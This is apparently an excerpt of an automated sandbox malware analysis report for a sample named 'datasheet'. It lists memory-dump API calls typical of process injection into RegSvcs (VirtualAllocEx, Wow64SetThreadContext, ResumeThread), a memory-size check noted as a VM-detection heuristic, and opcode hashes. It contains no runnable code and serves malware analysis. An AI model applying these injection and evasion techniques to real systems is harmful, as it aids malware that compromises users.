                                                            • Blocks: 434 (724c798-724c7e3), 436 (724c7e5-724c7f1), 437 (724c7f3-724c823, calls Wow64SetThreadContext), 439 (724c825-724c82b), 440 (724c82c-724c85c)
                                                            • Edges: 434->436, 434->437, 436->437, 437->439, 437->440, 439->440
                                                            APIs
                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0724C816
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193016632.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7240000_datasheet.jbxd
                                                            Similarity
                                                            • API ID: ContextThreadWow64
                                                            • String ID:
                                                            • API String ID: 983334009-0
                                                            • Opcode ID: 770cbe0a810469efad947c27f355ad4ea0fab1316ed12ea18bd1bc8d4b9d1701
                                                            • Instruction ID: da91ea617cff80f3c3c876919a9745217c819cf97971dfdc6d89798a09730a73
                                                            • Opcode Fuzzy Hash: 770cbe0a810469efad947c27f355ad4ea0fab1316ed12ea18bd1bc8d4b9d1701
                                                            • Instruction Fuzzy Hash: 6C2118B1D0030A9FDB14DFAAC4857AEBBF4EF88324F148429D519A7240DB789944CFA5
                                                            APIs
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0724CAA0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193016632.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7240000_datasheet.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessRead
                                                            • String ID:
                                                            • API String ID: 1726664587-0
                                                            • Opcode ID: 0cffdcd028fa19a6a5c0aea4ff2b0043ace95663474a71ef12a3f1aad94b971f
                                                            • Instruction ID: 4257439c08ab7540b58ad8a42ce75ab1840fc0cd218dccdb61f6872503485edf
                                                            • Opcode Fuzzy Hash: 0cffdcd028fa19a6a5c0aea4ff2b0043ace95663474a71ef12a3f1aad94b971f
                                                            • Instruction Fuzzy Hash: DF2128B1D0135A9FDB10CFAAC881BEEBBF5FF88310F10842AE518A7240D7799550CBA5
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02B3D68F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2186042993.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2b30000_datasheet.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: 9f3bd1cb7db45d156402089db28cbcae15c6bc1bfad34465c5d4983eed2eb83f
                                                            • Instruction ID: 9dc7749e041c5e5ed3777c31bb72646d416a06e0287e087afda058cae6b5bab9
                                                            • Opcode Fuzzy Hash: 9f3bd1cb7db45d156402089db28cbcae15c6bc1bfad34465c5d4983eed2eb83f
                                                            • Instruction Fuzzy Hash: AE21E4B59002099FDB10CFAAD984ADEBBF4FB48320F14845AE918A3310D379A954CFA4
                                                            APIs
                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0724C8DE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193016632.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7240000_datasheet.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 5ec45d111b8f2a6a0dbd99918785ef1473a4a52c05d5a8c6f6c031ed78d4f0ee
                                                            • Instruction ID: a88a8e5b09250683ca7b42ef2ed57d2c37eba65912884d99880e0b9a0546f20f
                                                            • Opcode Fuzzy Hash: 5ec45d111b8f2a6a0dbd99918785ef1473a4a52c05d5a8c6f6c031ed78d4f0ee
                                                            • Instruction Fuzzy Hash: A3218C7290034A9FDF10CFAAC845BDFBFF5AF88320F14841AE519A7250CB769550CBA1
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193016632.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7240000_datasheet.jbxd
                                                            Similarity
                                                            • API ID: ResumeThread
                                                            • String ID:
                                                            • API String ID: 947044025-0
                                                            • Opcode ID: 4ce19604780d5740271c93aa9974b810a32c44f316d52f1d07e8802ac551eded
                                                            • Instruction ID: 58dd82566be194653e79485023019c2f37c1a7bdf4b53de31ea0f6daec79f89c
                                                            • Opcode Fuzzy Hash: 4ce19604780d5740271c93aa9974b810a32c44f316d52f1d07e8802ac551eded
                                                            • Instruction Fuzzy Hash: 701179B190034A9FDB24CFAAC4457DFFBF4AF88220F208419D219A7200CB79A500CB98
                                                            APIs
                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0724C8DE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193016632.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7240000_datasheet.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 4da1d005b8abd7bcdf35db20a6dec6bb56989e6b00bf126169b1af54b056fe41
                                                            • Instruction ID: d91cd319dfacc945601023164f07204c7b3ed458888f872a31d7a34f1b1d0bcc
                                                            • Opcode Fuzzy Hash: 4da1d005b8abd7bcdf35db20a6dec6bb56989e6b00bf126169b1af54b056fe41
                                                            • Instruction Fuzzy Hash: E01126B290034A9FDB10DFAAC845BDFBBF5AF88320F148819E519A7250CB75A550CBA1
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193016632.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7240000_datasheet.jbxd
                                                            Similarity
                                                            • API ID: ResumeThread
                                                            • String ID:
                                                            • API String ID: 947044025-0
                                                            • Opcode ID: 9f18a5d60105c3e509753b14b360019551c8eb46be23606c1f6e6926ecaf05de
                                                            • Instruction ID: 6b2dae97969329a357b6ed74c5bcdbf14090c3f7f1bea8302fa79761e0aa2a23
                                                            • Opcode Fuzzy Hash: 9f18a5d60105c3e509753b14b360019551c8eb46be23606c1f6e6926ecaf05de
                                                            • Instruction Fuzzy Hash: DF1136B190034A8FDB24DFAAC44579FFBF5AF88724F248419D519A7240CB79A940CBA5
                                                            APIs
                                                            • PostMessageW.USER32(?,?,?,?), ref: 07C01275
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193299094.0000000007C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7c00000_datasheet.jbxd
                                                            Similarity
                                                            • API ID: MessagePost
                                                            • String ID:
                                                            • API String ID: 410705778-0
                                                            • Opcode ID: 15eb94a38d3a40930ba012a84c0c37408a40e0ff8e5ef2c3f759d62cf4fd4044
                                                            • Instruction ID: 4cb7541d421ecbd914170b68fa18e372f6aaa33ad0b03f09103169193192176a
                                                            • Opcode Fuzzy Hash: 15eb94a38d3a40930ba012a84c0c37408a40e0ff8e5ef2c3f759d62cf4fd4044
                                                            • Instruction Fuzzy Hash: F311E3B5800349DFDB10DF99D885BDFBBF8EB48724F20841AE518A7640C375A544CFA1
                                                            APIs
                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 02B3B386
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2186042993.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2b30000_datasheet.jbxd
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID:
                                                            • API String ID: 4139908857-0
                                                            • Opcode ID: 4665d62ad244b151979aa631648e0fb27e48395d1d41a03069dcb153642dc6ee
                                                            • Instruction ID: b6588a7c9e74780f6d1f5f3ad3ac85790433ac5ea572f09a560c76ecf009fc42
                                                            • Opcode Fuzzy Hash: 4665d62ad244b151979aa631648e0fb27e48395d1d41a03069dcb153642dc6ee
                                                            • Instruction Fuzzy Hash: C711DFB6C007598FDB10CF9AC544B9EFBF4EB88624F10845AD429B7610D379A545CFA1
                                                            APIs
                                                            • PostMessageW.USER32(?,?,?,?), ref: 07C01275
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193299094.0000000007C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7c00000_datasheet.jbxd
                                                            Similarity
                                                            • API ID: MessagePost
                                                            • String ID:
                                                            • API String ID: 410705778-0
                                                            • Opcode ID: ecc1366556147667b5ee22828918f669e70f92d6a79e8796854469668a396bf9
                                                            • Instruction ID: 857e5a0eefb820b3607da6bf5ebd4fd3db93923f82d5e6cc142eaba876e13b4d
                                                            • Opcode Fuzzy Hash: ecc1366556147667b5ee22828918f669e70f92d6a79e8796854469668a396bf9
                                                            • Instruction Fuzzy Hash: 3611C2B5800349DFDB10CF9AC585BDEFBF8EB48324F148419D518A7650D375A554CFA1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2184348153.0000000000EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EED000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_eed000_datasheet.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 46307277d55193fdc5aee1b4c8d277619a37732e1d3b1bc88a59a9eba6e61c8b
                                                            • Instruction ID: ad5770246b8d5fe6997f3404c33cd041ce471c6d7a0bbee8691cba2da1b85cff
                                                            • Opcode Fuzzy Hash: 46307277d55193fdc5aee1b4c8d277619a37732e1d3b1bc88a59a9eba6e61c8b
                                                            • Instruction Fuzzy Hash: 52213475608388EFCB14DF15D9C0B26BB66FB84318F28C56DD90A5B292C37BD807CA61
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2184348153.0000000000EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EED000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_eed000_datasheet.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: df0de72dd896a339bc9db67fa1a12ddf23e3ea545a6cab933345cd7ac66eabcd
                                                            • Instruction ID: 7f0f0696f5721d79f952b972d761e69aa026a5773958e97e968265b927f54c55
                                                            • Opcode Fuzzy Hash: df0de72dd896a339bc9db67fa1a12ddf23e3ea545a6cab933345cd7ac66eabcd
                                                            • Instruction Fuzzy Hash: 25214675508388EFDB04DF51DDC0B26BBA5FB88318F20C56DEA095B2A2C376D806CA61
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2184348153.0000000000EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EED000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_eed000_datasheet.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7ef2ac39ab9d4b7d18c1473f44a481cc51c577ef60e315a2cd23f38849ce3a06
                                                            • Instruction ID: fd508d0cf58dc9f7a5c920aa2be16709419768a23d7bc8f7d460c17e39b1d65d
                                                            • Opcode Fuzzy Hash: 7ef2ac39ab9d4b7d18c1473f44a481cc51c577ef60e315a2cd23f38849ce3a06
                                                            • Instruction Fuzzy Hash: 6821537550D3C48FDB12CF24D994715BF72EB46314F28C5EAD8498B6A7C33A980ACB62
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2184348153.0000000000EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EED000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_eed000_datasheet.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                            • Instruction ID: b23d55dadc6ba77f63cb5238fd645ac8ee9f345a2d8c037e8eb9574f5cf256ee
                                                            • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                            • Instruction Fuzzy Hash: 9D11DD79508284DFCB01CF50CAC0B15FBB1FB88318F24C6ADD9494B2A6C33AD81ACB61
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2184280984.0000000000EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EDD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_edd000_datasheet.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f197d525734a4585737f1e3ced45c1c4d02780265c7e1dc23631b2bbe27f2276
                                                            • Instruction ID: 2bb5e333c49b71f50d71664da416c6be08fca5b9a78265bab1aafbab9d6bbc72
                                                            • Opcode Fuzzy Hash: f197d525734a4585737f1e3ced45c1c4d02780265c7e1dc23631b2bbe27f2276
                                                            • Instruction Fuzzy Hash: 1F01267100C344DAE7108E25CD80BA6FF98EF41324F18D49BED082A386C7B99841C6B2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2184280984.0000000000EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EDD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_edd000_datasheet.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 935b50d2043f1adc9ac80f664e9d09ed010fb2831ce2b22fd46cd136fc00f9c0
                                                            • Instruction ID: 0743d5fce9de8940de4f1ce76595fb253cebe10ce20ea7f1bbf20e52c899126b
                                                            • Opcode Fuzzy Hash: 935b50d2043f1adc9ac80f664e9d09ed010fb2831ce2b22fd46cd136fc00f9c0
                                                            • Instruction Fuzzy Hash: F2F062714093449EE7108E16DD84B66FFA8EF91729F18C45BED085B386C379A845CAB1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193016632.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7240000_datasheet.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f83a18947dd8ba5b0df6de1b48e5ba50918fe01091d53c75165c64ee138ee099
                                                            • Instruction ID: 8a88b7d372dfa49f47ac188152f4553ce84893e25500d825b190d10e95b88b6a
                                                            • Opcode Fuzzy Hash: f83a18947dd8ba5b0df6de1b48e5ba50918fe01091d53c75165c64ee138ee099
                                                            • Instruction Fuzzy Hash: 13E11BB4E102598FDB14DFA9C580AAEFBF2FF49305F248269D415AB355D730A942CF60
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193016632.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7240000_datasheet.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c3b1ef71bd2247b78c7cc0d85ece020a3c3ecdc77af3757b2c383508c10ccb43
                                                            • Instruction ID: 751c1fe37be518ac817a85b39611c75348be10ecd3114c00ff18b34e7cb572a7
                                                            • Opcode Fuzzy Hash: c3b1ef71bd2247b78c7cc0d85ece020a3c3ecdc77af3757b2c383508c10ccb43
                                                            • Instruction Fuzzy Hash: 39E12EB4E112598FDB14DFA9C580AAEFBF2FF89305F248169D405AB355D730A982CF60
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193016632.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7240000_datasheet.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f6455ec3db446fc3d9854955b5d4f38efdb54a8e10fc53dd8535185df76528fb
                                                            • Instruction ID: aced35a329189f5f8581f46d8e7afbc38280188f5ec2a6090b666a4b0ef48374
                                                            • Opcode Fuzzy Hash: f6455ec3db446fc3d9854955b5d4f38efdb54a8e10fc53dd8535185df76528fb
                                                            • Instruction Fuzzy Hash: C7E13EB4E111598FDB14DFA8C580AAEFBF2FF49304F248169D405AB355D770A982CF60
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193016632.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7240000_datasheet.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f2d163646851a16548a7b2c7e36b0b95fc2a12dadb59164171f93efafb1ea92c
                                                            • Instruction ID: 2e9ace81bb08e33ca4497035920e9d0516c8003ac9a97e66ad8032c18db5911e
                                                            • Opcode Fuzzy Hash: f2d163646851a16548a7b2c7e36b0b95fc2a12dadb59164171f93efafb1ea92c
                                                            • Instruction Fuzzy Hash: 58E12BB4E102598FDB14DFA8C580AAEFBB2FF89305F24C169D405AB355DB71A942CF60
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193016632.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7240000_datasheet.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 573d35aac4f37321c1a2a7e4a5c97f4ecaf03fbb88a0b69c60a7be90e8a1b2e4
                                                            • Instruction ID: 6639197d335c090b6cc406ff9d567b68d3db83fef2008f912fc1e7bc3cc612a9
                                                            • Opcode Fuzzy Hash: 573d35aac4f37321c1a2a7e4a5c97f4ecaf03fbb88a0b69c60a7be90e8a1b2e4
                                                            • Instruction Fuzzy Hash: E3E13CB4E102598FDB14DF99C580AAEFBF2FF89305F248169D445AB355D730A982CF60
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193299094.0000000007C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7c00000_datasheet.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cefca3dd534aab6171bb5d0b0e9921c6f199a27b7b5f0bd24c42fca5a283ebd8
                                                            • Instruction ID: 89cdac9a9af734fc74e82d4283071bd4f32a19a0c89cfa8cac2602471dcf066f
                                                            • Opcode Fuzzy Hash: cefca3dd534aab6171bb5d0b0e9921c6f199a27b7b5f0bd24c42fca5a283ebd8
                                                            • Instruction Fuzzy Hash: 93D1D4B4A00545CFDB08DF69C598AA9B7F1BF8D711F2580A9E505AB3B1DB31AD40CFA0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193016632.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7240000_datasheet.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1727de278823a49671b3378d6b853da515a384c551b59af01c1b1f5893237ec5
                                                            • Instruction ID: a96add8477b7f1007d1841584dc8d87cd87e26f76714b72b88e2787545477e89
                                                            • Opcode Fuzzy Hash: 1727de278823a49671b3378d6b853da515a384c551b59af01c1b1f5893237ec5
                                                            • Instruction Fuzzy Hash: 33D12631D2075ACADB00EBA4D8A4699B7B1FF95300F51C79AE00937225EFB06AC4CF91
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2186042993.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2b30000_datasheet.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ff2160b2c91dabf3f18a07282bd98d3d85afe1abb1fcfb3c116700b581d73488
                                                            • Instruction ID: 289fd4b414c05448ee39c2022c6d4a6dce0632c697c1ad40e7ca50f131fc5749
                                                            • Opcode Fuzzy Hash: ff2160b2c91dabf3f18a07282bd98d3d85afe1abb1fcfb3c116700b581d73488
                                                            • Instruction Fuzzy Hash: EAA15F36E0061ACFCF16DFB4C4845AEB7B2FF84304B1545AAE805AB265DB71E956CF80
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193016632.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7240000_datasheet.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4ae0b133710d38fbc0aecb6500dcc850fb1d7088ff2f241084165c669e68db7d
                                                            • Instruction ID: 967f5c5f2081803e46991b5f8f87811aeae23ffa8304eb256609a813f0d8a547
                                                            • Opcode Fuzzy Hash: 4ae0b133710d38fbc0aecb6500dcc850fb1d7088ff2f241084165c669e68db7d
                                                            • Instruction Fuzzy Hash: 7CD11531D2075ACADB00EBA4D8A4699B7B1FF95300F51D79AE00937225EFB06AC5CF91
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193016632.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7240000_datasheet.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 94d6d6ce98935e2c1af1493d49f9912aff24282f00c498a08c890830917ce5e3
                                                            • Instruction ID: 068a1a8e4a703ee231efac023a759dca7b81f155431bf1d0f66d07591ec8069f
                                                            • Opcode Fuzzy Hash: 94d6d6ce98935e2c1af1493d49f9912aff24282f00c498a08c890830917ce5e3
                                                            • Instruction Fuzzy Hash: 91514FB5E102598FDB18CFA9C5446AEFBF2FF89304F248169D418AB355D7319982CFA0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193016632.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7240000_datasheet.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 86413d1269d8ad99c92cdcdc09da2868b3490434ec2acea5a152ac966a4210fa
                                                            • Instruction ID: 50c6322670608dc40b9312a1bfdbe212dc471ce53c64cbc19dc065da82d6ae8b
                                                            • Opcode Fuzzy Hash: 86413d1269d8ad99c92cdcdc09da2868b3490434ec2acea5a152ac966a4210fa
                                                            • Instruction Fuzzy Hash: 595141B4E102198FDB14CFA9C5806AEFBF6FF89304F248169D458AB355D730A982CF60
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193299094.0000000007C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7c00000_datasheet.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4cd114d85cc9ee0876660589b481dc68ee1919aafa262f1a38a3f70577a65906
                                                            • Instruction ID: 5489ec0c095b5acb5690e2faf45e7626ae1edc9da1db3886a49b39f5f9e3e573
                                                            • Opcode Fuzzy Hash: 4cd114d85cc9ee0876660589b481dc68ee1919aafa262f1a38a3f70577a65906
                                                            • Instruction Fuzzy Hash: 19313DB1D093988BEB15CF6798543D9BBF6AF86310F15C0EAC44CA6151DB740A89CF91

                                                            Execution Graph

                                                            Execution Coverage: 11.4%
                                                            Dynamic/Decrypted Code Coverage: 100%
                                                            Signature Coverage: 0%
                                                            Total number of Nodes: 11
                                                            Total number of Limit Nodes: 2

                                                            Execution graph (interactive widget; node and edge list not reproduced): entry at 15f7ea8 -> 15f7eb2, which either falls through to 15f7ecc or calls one of two parallel stubs in the 06AC0000 region, 6acda90 and 6acdaa0. Each stub loops between 6acdab5 and 6acdce1, where GlobalMemoryStatusEx is called (the API reports total and available physical memory and is a common virtual-machine heuristic), and returns through 6acdcca to 15f7ecc.
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 49c1fa7e0c4e008cece7df58604a566ff754c3541630532d45e8f9ce3841ad31
                                                            • Instruction ID: 2cf7faa944f879dd1f512c91b0434bc30cf518cc0a72b21bbead39862cfa45fa
                                                            • Opcode Fuzzy Hash: 49c1fa7e0c4e008cece7df58604a566ff754c3541630532d45e8f9ce3841ad31
                                                            • Instruction Fuzzy Hash: 8553E531C10B5A8ADB51EF68C8805A9F7B1FF99300F15D79AE4587B121FB70AAC5CB81

                                                            Control-flow Graph (interactive widget; basic-block edge list not reproduced): function 15f3e70-15f4170, with three call sites into 15f0ab8 (at 15f4117, 15f412b and 15f413f) and no Windows API calls resolved; the graph ends in a self-looping block at 15f4170.
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: \V[n
                                                            • API String ID: 0-1005319620
                                                            • Opcode ID: 128efc9b11de68246af2a50dc4508c9527b968f22c9fc1bd2cc14851d8266b3f
                                                            • Instruction ID: 0ac14fb198904501f1da1abeafe59d66979f67c77680d6b1b07dd1ffb152d1e1
                                                            • Opcode Fuzzy Hash: 128efc9b11de68246af2a50dc4508c9527b968f22c9fc1bd2cc14851d8266b3f
                                                            • Instruction Fuzzy Hash: E2917070E00209CFEF14CFA9C99179EBBF2BF88714F14812DE515AB254EB749845CB81
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 240dfd33214f3a6306e3aab77d52adfcbb2277c6b75fe5405c885c07b9cd6810
                                                            • Instruction ID: 11970d30e8f56864c94d8cc3b6b126af7f8ab3c72dea0ba09f8b50eb128dc98a
                                                            • Opcode Fuzzy Hash: 240dfd33214f3a6306e3aab77d52adfcbb2277c6b75fe5405c885c07b9cd6810
                                                            • Instruction Fuzzy Hash: 17B14A70E006098FEF14CFA9C8957AEBBF2BF88714F14852DD915EB294EB749845CB81

                                                            Control-flow Graph (interactive widget; basic-block edge list not reproduced): function 15f47f4-15f4a4c, with two call sites into 15f0ab8 (at 15f4a07 and 15f4a1b) and no Windows API calls resolved; the graph ends in a self-looping block at 15f4a4c.
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: \V[n$\V[n
                                                            • API String ID: 0-3705941238
                                                            • Opcode ID: cb1b7d4b77240d4ce283b652bbf6c082cc2c19fbc5c7dfc03b0555a0d8553420
                                                            • Instruction ID: dc893e5239fb0e3535b892c0e0a938c026e9c0527a3d29894668a168afd2416f
                                                            • Opcode Fuzzy Hash: cb1b7d4b77240d4ce283b652bbf6c082cc2c19fbc5c7dfc03b0555a0d8553420
                                                            • Instruction Fuzzy Hash: CD716970E002498FDB10DFA9D9807EEBBF2BF88714F14812DE555AB254EB749846CF91

                                                            Control-flow Graph (interactive widget; basic-block edge list not reproduced): function 15f4800-15f4a4c, a later entry into the same body as 15f47f4 above, with the same two call sites into 15f0ab8 (at 15f4a07 and 15f4a1b) and the same self-looping tail at 15f4a4c.
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: \V[n$\V[n
